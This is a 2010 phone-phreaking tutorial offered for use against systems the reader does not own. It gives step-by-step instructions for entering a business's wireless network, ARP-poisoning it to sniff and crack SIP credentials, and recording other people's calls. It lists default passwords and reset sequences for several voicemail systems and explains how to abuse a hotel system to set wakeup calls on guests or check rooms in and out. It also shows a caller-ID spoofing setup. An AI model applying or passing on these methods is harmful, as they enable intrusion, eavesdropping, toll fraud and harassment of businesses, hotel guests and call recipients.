Phones & Tones: Second Edition by Murder Mouse Section 1: The Introduction ---------------------------- Greets and meets. Well it's definitely been a while since my last tutorial and with a new decade upon us now is as great a time as ever for a much needed update. Phreaking has definitely seen some changes since I wrote the original release. Joybubbles is gone, voip is now the standard for almost any PBX, and in most cities in the US payphones are just a memory. In fact as I'm writing this the FCC is already debating on how to convert the entire PSTN to voip. As decades come and go the landscape of telephony is constantly changing, and with it so does phreaking. Whether the calls are carried through tandems or routers (technically on landline it's both) the drive to explore and understand this landscape will always keep phreakers going. So it's in this spirit that I write this guide. One thing I'd like to point out before I get started is that I have decided to write this a little differently than my original release. I've stripped away much of the technical details in favor of keeping the guide as simple and straight forward as possible. However this means that I'm writing this guide with the assumption that you the reader already have at least a basic understanding of telecommunications. I've included some links and suggestions around the end of this guide and I'd suggest you check through them if you need to. So with all that said, lets begin. Section 2: Exchange Scanning ----------------------------- Well as before lets start this discussion off with an explanation of exchange scanning. Exchange scanning for those of you who don't know is simply picking up the phone and dialing down a range of phone numbers to see what you come up with. This is how you will find all those interesting numbers you can fuck with and share (voicemail systems, test numbers, ANACs, strange recordings, etc). So how do you get started? Well an exchange, also known as the NXX, are the middle three numbers in any phone number (i.e 555-xxx-1337). Most people when they first really get started scan their own exchange, usually starting with the low end of the exchange (i.e NPA-NXX-00xx, NPA meaning the area code). So you would start off dialing NPA-NXX-0000, write down what you hear, then move on to 0001, 0002, and so on and so forth. If you're the paranoid type you might want to randomize your call sequence in order to make it slightly less obvious what you've been up to. As in go from 0000, to 0021, to 0076, to 0014, etc until you've scanned the first 100 numbers on the exchange. This of course is entirely up to you, and at least in the United States exchange scanning is legal in most areas (I think I remember reading about a law in Conneticut concerning this but I'm not really sure on that). So anyways when scanning you will probably want to make a list for yourself of the results for later review or to share. It's best to make some legends (acronyms) for yourself in order to abbreviate some of the most common finds while you're scanning. Provided below is the list I use for all of mine, which is partly based on the standard proposed on binrev a couple years back.. CC- Cannot be completed CR - Cannot be reached from your calling area NS - Not in Service D - Disconnected CB - All circuits busy RO - Reorder B - Busy FX - Fax machine R - Rings HELO - Hello? VM - Voicemail VMS - Voicemail System Of course you're free to use whatever legends you like, but just be sure you leave a list of them at the top of your exchange scans if you plan on sharing them with anyone. If you need some examples to go on you can check out some of Information Leak's exchange scans below... www.informationleak.org/viewforum.php?f=43 Anyways it's best to scan during different times of the day depending on what kind of exchange scan you are doing. For local exchange scans or any scans that involve the probability of hitting a lot of residential lines it's best to scan anywhere from mid-morning to mid-afternoon if you can. This is because most people will be up and out of the house (work, school, whatever). Of course any time that doesn't involve interrupting peoples' much needed sleep will work just fine. On the other hand if you're doing a toll free scan (1-800, 866, etc) or scanning a range assigned to a specific PBX (more on this later) then you'll want to scan in the middle of the night (after business hours). So with all that said I'll close this section as I did last time by helping you identify some of the sounds you'll be coming across while scanning.. Fax Machines - No need to tell you what a fax machine is, but you'll come across many of them while scanning and being able to pick out their tones can be important. Most fax machines you'll come across will have a modem sound (like the sound a modem makes when using dialup), but with a slightly flatter sounding series of tones. It's kind of hard to describe, but once you hear it it's easy to notice. Of course some other fax machines have completely different tones. Some have a low pulsing tone, and some others have a much more drawn out series of tones than most. You'll hear all of them as your scanning so it's a good idea to get familiarized with these tones early on. Milliwatt Test Numbers - These are one of the most common test numbers, and you'll be painfully aware of what they are when you stumble across one, literally. The tone is a very loud consistant tone. ANACs - These are very common numbers to come across, but if you're not paying attention to the recordings you are stumbling across you can easily miss them. These are especially common during toll free scans due to how many business recordings will read off the ANI (and in some extremely rare cases even include the ANI II identifier, feel privileged if you manage to snag a number like this). On the other hand the ANACs that line technicians use are pretty easy to discern since the recording will just immediately read off the ANI. All I can tell you is pay attention. DISAs - These are the administrative lines for analog PBXs and needless to say are a lot less common to come across than they were just a few years ago. This like I said in the introduction is because most businesses, departments, etc have upgraded their PBXs to voip systems. If you do come across these though you will recognize them in a wide variety of ways. Some of the older analog systems have a more low consistant tone upon connecting, but I haven't really heard these anytime I scan. Most of the analog PBXs still up and kicking will pick up with either complete silence (meaning it's waiting for DTMF input), or a dial tone. Of course there are some other types of systems besides DISAs that may sit and wait for DTMF, but commonly the login process is still the same irregardless. DATUs - These are one of the best finds you can come across, but I'm not really sure how common of a find they are these days since DATUs have never really been a part of the telco here. Used to before AT&T bought the area out BellSouth was using VoiceSystems which functioned just like DATUs, but required a specific modem in order to access the prompt (otherwise it would just hang up as soon as you called it up). Either way these are administrative lines used by line technicians for basic repair and tests on subscriber lines within a given exchange, and you'll recognize one as a half ring followed by a low tone. I'll link some information on it later in the guide. VMBs - Of course by VMBs I don't mean the individual mailboxes you'll come across when scanning PBXs and such, but specifically the voicemail system lines for logging in and checking messages and such on the mailboxes. Just like ANACs to fish these out you have to really just pay attention to any recordings you come across. Some voicemail systems will announce what kind of system it is as soon as you connect, while others will just go straight to asking for your user id. What to do from here will be discussed in a later section. Also once you get a handle on exchange scanning you should look into unpublished exchanges. Most of these are the exchange numbers you normally dial to reach common services (411, 911, 211, etc), but depending on the LEC there may also be a telco exchange used just for test numbers (like 959 in the AT&T areas). To get unpublished exchanges just go to nanpa.com and look for Central Office Code Assignments that are close to your area (remember, Utilized means used). Compare this list to the list in your phone book, and any exchanges that aren't listed in the phone book besides the obvious services mentioned before can be considered special interest exchanges. Finally before I finish here I should mention that if handscanning seems too daunting for you and you really want to go the wardialer route (to each their own) and you're a Linux user then I'd suggest looking into iWar. Has plenty of nifty options, including support for protocols like IAX2. Check the link below for details.. www.softwink.com/iwar/ Section 3: Hacking PBXs ------------------------ Well now that we're done with exchange scanning we can move on to PBXs. How you will go about exploring, exploiting, fondling, or whatever you feel like doing with a PBX varies greatly depending on the kind of PBX it is, but a great place to start either way is to do a little poking around on the phone. First crack open the phone book or go over to superpages.com and look up any business/department/etc you have in mind to see all the listed numbers for that organization. Some of the larger businesses in your area may have a range of numbers reserved. If so you will see that all of the listed numbers are basically the same. Say the main office line is NPA-NXX-5500, their fax line is NPA-NXX-5504, and their accounting department is NPA-NXX-5542. Then it's safe to assume that a great place to start is to scan the NPA-NXX-55xx range. Take note of all the numbers listed and start exchange scanning down the rest to see what you come across. Otherwise if there isn't a range to scan try calling the main line (after business hours of course) and listen through the recording. Sometimes the recording will go through a list of extensions for different departments that the caller might be inquiring about. Listening through this gives you the opportunity to figure out the extension range, which you can then scan through like you would an exchange scan. Say the main office is 10, the accounting department is 15, senior manager is 22, and so on and so forth then it's safe to assume that the range goes anywhere in between 10-99. So just like an exchange scan you would take note of all the extensions listed, and then just keep calling back and trying all the extensions that weren't mentioned. Most of the interesting extensions that you'll come across will be at the end of the range (50, 99, 9999, wherever the extension range ends) since all the office/department lines are going to be assigned at the start on up. If all your after is the voicemail system (more on these later) then you can cut short how many times you have to call back by scanning up in 10s. Say the main office line is 10, then you can start at 20 and just keep going up until you find what you were looking for. Otherwise trying them all will at the very least as would an exchange scan give you a decent idea of what kind of PBX you are dealing with. Say you hear a lot of Audix mailbox recordings, then you are dealing with an Avaya PBX (which is a very popular voip PBX). Just at the very least listen out for anything that could help you identify what exactly you're up against, and use google to do a little bit of homework on it. User guides, installation manuals, any of the vendor sites can give you a plethora of information that you can use later on (default passwords, etc). So lets say for starters that you're scanning an analog PBX and happen to come across a DISA line. Well from here you would try guessing the passcode and seeing if you get lucky. Try combinations like 9999#, 1234#, etc and if you catch a dial tone then consider yourself lucky and use it however you like (dial out, fuck around with a little, whatever). Of course a more likely scenerio when scanning is that you don't find a DISA line, but instead cop enough recordings to figure out what kind of voip PBX you're dealing with and get all the information you need on it (Avaya, Shoretel, etc). Well then you'd pack up your laptop with a softphone like X-Lite downloaded (in case you want to dial out), get over around the business you're targeting (during business hours), and see if there are any wireless access points you can use. How to crack the key if it's protected is beyond the scope of this tutorial so lets just say for shits and giggles that there is an AP and it's unprotected. Well a good start from here would be to start scanning the network for SIP servers. The port for these is 5060 on either UDP or TCP, so in nmap you would scan for these with the following.. nmap -sU -p 5060 192.168.1.1-254 Another more thorough option for Windows users is to download SiVuS and scan the network that way. SiVuS has an entire suite of tools that you can use in order to enumerate any information you can, and attempt some common hacks against the server (REGISTER attempts, all that good stuff). Link provided below... www.vopsecurity.org Also while I'm giving program suggestions I would also recommend checking out sipvicious, which is a series of python scripts that can be used for scanning, enumerating, and cracking SIP proxies and servers on the network. http://sipvicious.org/blog/ So lets say of the three you decide to use SiVuS to scan for any weak points in the network you will first want to see if you can find any SIP servers. First go to SIP Component Discovery and in the "Target network" field enter something like 192.168.1.1-254 (whatever the network range is) and then click Scan. Let this play through and see if you find any SIP servers. If you do now you can scan the SIP server for any common attacks. Just go to the SIP Scanner tab, and click on Scanner Configuration. Enter the SIP server you found before and check "Probe Targets". From here you can also configure other aspects like what sort of authentication to use (most SIP servers use MD5, but cleartext still isn't completely out of the question), what sort of method checks to use, security checks, log file to save, and other aspects of the scan. Then just click over to the Scanner Control Panel tab and initiate the scan. Now what you can do from here depends on what you come across while scanning the network, and what your SIP server scan pulled. A great place to start if the scan didn't pull anything useful in your case is to try and grab some usernames on the server. To try this you have two options. You can either with SiVuS manually test usernames, or use Cain & Abel to try and sniff usernames over the network. To manually test possible usernames in SiVuS go to Utilities/Message Generator and fill out the appropriate information. For example Method to REGISTER, Called User being the user you are attempting to get a response from, Domain Host being the ip or hostname of the SIP server you discovered, change the To to usertotesthere and From to whatever, and change Subject and User Agent to make it less obvious on the network what exactly you are doing. Then click start and see what sort of response you get from the server. A 401 response means you have a valid username, and 403 means that it's an invalid username. A good scheme to use if you are somewhat familiar with the business/department you are dealing with is to try the names of employees who work there. For example the first name, first initial and last name, first name and last initial, etc. This is a popular scheme for a lot of places so it's definitely worth a try. Even if you aren't familiar with the place you can try to take a casual visit into the business/department and keep a mental note of any of the employee names for future reference. Of course depending on the network it can many times be a pretty hefty task trying to test any possible usernames that way so lets get into sniffing over the network for possible usernames. For this like I said earlier we will be using Cain & Abel, which can be downloaded here.. www.oxid.it/cain.html Now what we first have to do is establish an ARP poison route on the network. To do so open up Cain & Abel and go to Configure. From here select your network card and click OK. From here click the + sign, and this will bring up the MAC Address Scanner. "All hosts in my subnet" should be active so just press OK. Now click the + sign again and you should see a list of hosts on the network on the left side. Click on the IP of the SIP server and select all the IPs on the right side, then just click OK. Now you can sniff all the usernames that pass over the server by looking through the To, From, and Contact fields on everything that passes through. Now from here one way or another you should have a decent list of usernames to use so now it's time to crack any of these users to get the password. From here you have two routes to go with, passive and active cracking. We'll first start off with active cracking. Open up SiVuS again and go to Utilities/Authentication Analysis. Here you will see Realtime Analysis on the left side of the window. Enter one of the users you found in the Called User field, and the IP of the SIP server in Domain/Host. Then enter the usernames and passwords files in and press Start. A good thing to go ahead and note is that a common password scheme is for the pass to be the same as the username, or the telephone/extension number of the user. So incorporating these into your password list would be a good idea. Of course the problem with active cracking is that most SIP servers will lock you out after 3 or so failed attempts, thus bringing us to our second option; passive cracking. For this lets assume that you still have Cain & Abel open from enumerating the usernames. From the Sniffer tab click on the Passwords tab, and scroll down till you see SIP. From here you should see some captured hashes, which you can then right click on and select either dictionary or brute force. If you choose dictionary crack just load the dictionary file the same way you would with an active crack, and then on the right side you will see some options you can choose to use with your dictionary file (reverse, double, numbered, etc). Brute force is pretty straight forward, but not recommended. You can also if you like while messing around with Cain & Abel use it to capture and listen in on conversations going over the LAN. To do this just establish an ARP poison route as you did before when sniffing out usernames, but instead of clicking on the SIP server just highlight all the hosts on the network, and any host connected to them. Then when you have the sniffer going after this just go to the VoIP tab from the Sniffer tab, and let that run for a while. That is basically it, from here Cain & Abel will start capturing, encoding, and recording any conversations going across the LAN. There are endless other vulnerabilities you can use related to the hard phones used, the software used (IAX vulns abound), etc. However for the sake of sanity I'm going to cut this section here and leave it to you to look into anything else you may want to try against the PBX. Section 4: Hacking Voicemail Systems ------------------------------------- Well now that we're finished discussing PBXs lets move on to VMBs. In the original release of Phones & Tones I basically slacked through it by linking up some tutorials from oldskoolphreak. Unfortunately most of the VMB hack tutorials floating around nowadays are pretty dated so I couldn't really slack through this section even if I wanted to. The methods are pretty much the same as ever, except that some voicemail systems popular these days (Audix for example) have no system account accessable through a TUI. This means for these you have to be on the LAN itself to access any administrative functions. Lets start with Audix. This is by far one of the most popular voicemail systems, which is used on Avaya PBXs. As mentioned before the administrative functions themselves are handled on a server within the LAN, which is unavailable outside the LAN. However you can remotely try to break into individual mailboxes. Just dial in, and as the announcement is playing hit # to access the login. While default passwords are determined by the administrator there are some common schemes you can try. Passes can be any length between 1-15, but most will be between 4-15. Some common passes to try are passes like 111111, 123456, the phone number of the mailbox (or the last 5 digits), etc. Just hit # again after hitting the pass attempt and if you are successful you can hit 4 to review messages stored or hit 3 to record a new greeting. Now lets move on to Merlin Mail. Unlike Audix Merlin does have a system administrative box for you to use. In order to access this from the main line hit 9997#. From here you will be prompted to enter a pass. The default pass from here depends on the version being used. For version 1 and 2 the default pass is 1234#, and for version 3 it's 123456#. The good thing about these is even if the default passes don't work you can reset the system to default (if you're feeling that malicious). Just hit 2537 (CLER), and you should hear a "goodbye", which will then disconnect you. Just call back to the system and then punch in the default pass to access the system admin box. Now from here you can hit 9 to access the administrative functions. In version 1 and 2 it goes straight to these options upon selecting, while with version 3 it will prompt you for a second login (the default pass is 654321#). From there just shift through the options and take your pick. Another popular voicemail system is PartnerMail VS. This one is actually very insecure in my opinion and I have no clue why it's so popular on business PBXs. The problem for one is that the pass limit is 4 digits. That's it, 4 digits and under is all anyone has to work with. The system admin box is 99, and the default pass for these is 1234. Unlike other systems (Audix and CallPilot for example) the system doesn't force anyone to change the default pass so there is definitely a stronger chance that even the system admin account might be still set at default. Though even if not you can still try other combinations (4321, 1111, 2580, etc). From here you can create a mailbox for yourself on the system by hitting 4. The system will read back what mailbox numbers are available, and prompt you to enter one in. Just enter one in that isn't used (preferribly on the higher end of the range) and hit # to confirm your choice. Of course even if you can't access the admin box to create your own mailbox you can try to break into any of the other mailboxes on the system. They all have the same default pass, and if that doesn't work you can try the combinations mentioned before or the extension/mailbox number of the user. Now that we're done with that lets move on the Cisco Unity VMBs. These are popular on a lot of college campuses (as are Cisco SIP hardphones, and basically anything Cisco). For these as soon as you reach the main line you would hit *, and enter the ID of the mailbox. This would be the phone number of the user, and the pass that follows by default would be the same as the ID. If this doesn't work you can try the same combinations as always (1234567, 7654321, 1111111, 1235789, etc). If you manage to guess the right pass from here you can hit 1 to listen to any messages, 3 1 to listen to any saved messages, and 4 1 to change the VMB greeting. So now that we've gone over campus VMBs lets move on to hotels. A popular system that many hotels use is DuVoice. Now the beautiful thing about playing around with a system like this is how integrated it is with the hotel operations as you'll find out. First lets go over the voicemail system itself. Now from here there are two accounts that are going to be of interest to you. 0 is the operator mailbox, and 991 is the greeting box. This greeting box is used for recording greetings on the system for the following day. The default pass for these is * 1234. Even if the default has been changed the pass should still be in the 4 digit range so treat it as you would a PartnerMail VS system. However this isn't even the half of this story. DuVoice also has DuVoice Hospitality. This is the system used to give out temporary mailboxes for their guests to use, which is integrated into an administrative TUI. To access this from the main line hit **97. Now there are a few levels of access you can use, rated from basic to expert. For our interests it's best to go with expert. The default pass for this is 7890#. From here you have 3 options, automatic wakeup call, re-record hospitality prompts, and guest room administration. In case you want to be a dick and set someone up for an imprompt wakeup call select 1, enter the mailbox number, enter the hour (00-23, military time), enter the minute (00-59), then it'll ask you if the hour is between 1-12. So then after that prompt you'll select 1 for am, or 2 for pm. Then press 1 to accept, and then set the day for the wakeup call. 1 for today, 2 for tomorrow, and press 3 to set the date. If you decide to spare the guests you can also go in and re-record the prompts by selecting 2 from the main TUI menu. From here you can press 1 to re-record the wakeup message, 2 for the wakeup announcement, 3 for the manager's welcome message, 4 for the text message notification, and 5 for the default greeting. From any of these it should play the current message. You can from here hit 1 to accept, 2 to re-record (press # when done), 3 to delete, and 4 restores the original. Finally for guest room administration press 3 from the main TUI. From here you have three options, 1 to check in, 2 to check out, and 3 to move. From any of these it will prompt you to enter the mailbox number followed by the # sign. There are definitely other voicemail systems that I could cover, but I'm going to cut it short here. There is Mitel, which the mailboxes have a default password of 1234 (and a LAN http server for configurations, http://192.168.215.1:8180 by default). CallPilot mailboxes you would treat like Audix, which are both fairly secure compared to some other voicemail systems. By far the most secure I think is IP Office. By default it doesn't have any means of remote administration, and the configurations can only be accessed via the user's extension (not exactly impossible, but a lot of effort for just one VMB). With everything else you stumble across just do your homework, google what you can, and see what you can find on it. Section 5: ANI Spoofing ------------------------ Well as before lets move on to ANI spoofing. ANI as you should know is the way in which you as the calling party is identified over the PSTN. This is of course completely separate from the CPN (caller ID), which is on an entirely separate channel. When ANI spoofing was first being popularized by Lucky225 it was as simple as picking the right operator (one that didn't forward ANI), and having them forward the call to it's destination. Nowadays of course any op is going to be able to forward ANI, however there are still plenty of toll free termination providers you can use. However before getting into that I'll first as before go over the list of ANI II assignments. These are the two digits proceeding the ANI that helps identify the type of call that is being placed. Linked below is a list of the assignments used.. http://www.nanpa.com/number_resource_info/ani_ii_assignments.html I'm going to first start off with Google Voice. Google Voice of course has a lot of options, and if you can cop an invite I would suggest getting an account yourself. One of these features is an outgoing call feature. Now while this normally will pass your CPN you can use *67 before you call up your GV number in order to pull an ANI spoof. You can use this to dial any toll free number, or call 800-CALL-ATT or something in order to op divert to another number. Of course I'm not sure how long this will last (credits to JmanA9 for bringing this up in binrev) so try not to do anything too stupid with this. If however you don't have a GV account or this trick no longer works by the time you read this you can try some toll free termination numbers to try the same thing. Check the list below for details.. http://www.voip-info.org/wiki/view/Toll+Free+Termination+Providers Section 6: CPN Spoofing ------------------------ So lets move on from ANI to CPN spoofing. This is of course a bit more useless than ANI spoofing, and is really just something to play around with for shits and giggles. It won't really keep your call anonymous (since your ANI is still carried over). The first tip I really have is using SOB Caller ID Generator, which can be downloaded below.. http://www.artofhacking.com/orange.htm Now it does have instructions on the download page and in the help file, but the use of this program is pretty straight forward. You can click Format to select the standard you will use. Unless you are hooking this up to the phone line in order to directly spoof the CPN on your own CPE (in which case you would use Standard) then the Call Waiting format is fine. So just punch in the name and number you wish to display, plug a pair of headphones into the speaker port on your computer, call the landline you want, and anytime after the person has picked up (yup, nothing to listen to your CAS tones before the other party picks up) put the headphones against the mouthpiece and go ahead and press the Play button to send over the spoofed CPN info. Of course all of this and anything that relies on tones will be completely outdated whenever the FCC successfully converts the entire PSTN over to voip, but for now this works just fine in the US (the tones can vary greatly in other countries). There are however plenty of other ways to spoof your caller ID which are far more effective. The best way to spoof caller ID is to use asterisk, which can be downloaded below.. www.asterisk.org/downloads Asterisk is an open source voip PBX that you should really get familiar with. I'll include some links around the end of this guide so you can install and configure your asterisk setup. For now though lets talk about how to use asterisk to spoof your CPN. Lets say you have asterisk installed and have setup an account with a provider. From here you will need to create the call file. This is what you will use to specify who you are calling, and the spoof number you are providing. Lets say for this example that your number is NPA-NXX-1337, you are wanting to call NPA-NXX-5148, and you want to spoof the number as NPA-NXX-6798. Just create /tmp/spoof.call and insert the following... Channel: IAX2/username:password@provideraddress.com/1NPANXX1337 Callerid: NPANXX6798 MaxRetries: 5 RetryTime: 60 WaitTime: 30 Context: spoofing Extension: NPANXX5148 Priority: 1 Then login as root, start up asterisk, and run the following command.. cp /tmp/spoof.call /var/spool/asterisk/outgoing Asterisk will automatically detect the call file and call your number, then when you answer dial the number you are wanting to call using the spoofed caller ID you provided. I have to warn you of course that caller ID spoofing is against the TOS for most voip providers so don't try this trick with providers that you are wanting to keep around. If Linux just isn't your bag and you have the cash to burn then I have to at least mention all the caller ID spoofing providers out there. The two main ones these days is phonegangster.com, and of course spoofcard.com. Personally if you have to go this route I would suggest using spoofcard.com. It has an option to change your voice, though I haven't really used it before so I can't tell you how well it works. There's also SpoofApp (www.spoofapp.com), which if you have an iPhone handy allows you to forward any outgoing calls through the spoofcard service. The choice is yours, but I would really suggest to just use the asterisk technique assuming you don't need much mobility in your spoofing. Section 7: Suggested Links --------------------------- Well I was planning on continuing this guide with a section on asterisk, but in retrospect there was just too much information out there to really add on anything useful. So instead I will just include links on how to install and configure asterisk. You should consider trying it out. Setting up your own voicemail system, conference bridge, diverter, etc are just one of the few things you can do with asterisk so it's definitely a huge suggestion. I provided a link to download asterisk, but if you need help installing and setting up asterisk try the link below... www.asteriskguru.com This site includes installation guides and everything else you could need to help setup asterisk on your own LAN. Now that I'm done with that I should suggest some links for basic information on telephony. As you might have noticed I didn't spare the acronyms in this guide, and didn't even bother explaining half the terminology I used in this guide. So if you found yourself confused reading this guide then I'd suggest the two following links.. www.tech-faq.com/telephone-wiring.shtml http://pt.com/page/tutorials/ss7-tutorial The first link would guide you through the inner workings of most of the protocols and terminology I went over briefly over the course of this guide, and the second link is a basic tutorial over ccss7, which is the current protocol the PSTN uses (until the FCC decides to convert it all). You will need to read through both in order to try understand how the phone system operates and if you're interested in truly exploring this sytem and understanding how it operates I'd suggest studying both. Also as promised is a brief text on DATU lines in case they're present in your LEC... http://www.nettwerked.net/datu.txt Now finally are my brief suggestions on sites to follow.. www.informationleak.net - As always this is my first suggestion. I'm not nearly as active on IL as I used to be, but Halla has been doing a great job of keeping the site alive and there is always an active community here that keeps all the information (including the phreaking bit) up-to-date. So keep track. www.oldskoolphreak.com - This site isn't nearly as active as it used to be, but there is still some decent guides on this site and it's updated every now and then. Still a somewhat decent reference for some information. www.binrev.com - Besides IL I'd absolutely suggest this forum for up-to-date phreaking information. The community has a lot of sections, but the phreaking section is very active and is definitely worth a check. Section 8: The Conclusion -------------------------- Well this is by far the longest time I slacked on any tutorial I had in mind. I had at least been thinking about writing this update since 2008, but for one reason or another always delayed it. Some decent reasons, but mostly just laziness. As before I hope that I've grabbed your interest in phreaking, but I'd like you to keep in mind that there is much (and MUCH and MUCH) more to phreaking than breaking the law. All the sections I wrote on breaking into random systems were more or less just teasers, but I hope out of this and playing around with all this you've snagged some sort of appreciation for telephony and will continue from here. If this guide grabbed your interest by all means learn what you can. If this is really your first introduction to telephony there is a lot to be learned and I hope you find it as fascinating as I do. I'm willing to help where I can, but I can't help everyone. I've included some contact information below if you need more help. I can't promise you any immediate help, but I'll help who I have time for. Murder Mouse fuck .opyright, 2010 pla229 [skat] gmail [rot] com www.informationleak.net http://houseofhackers.ning.com/profile/MurderMouse Yahoo! ID: murder_mouse Skype ID: murder-mouse IRC: irc.2600.net | #infoleak | nick: MurderM (Update: Op diverting through Google Voice no longer works. It was fun while it last, but you can still ANI spoof through voip termination numbers)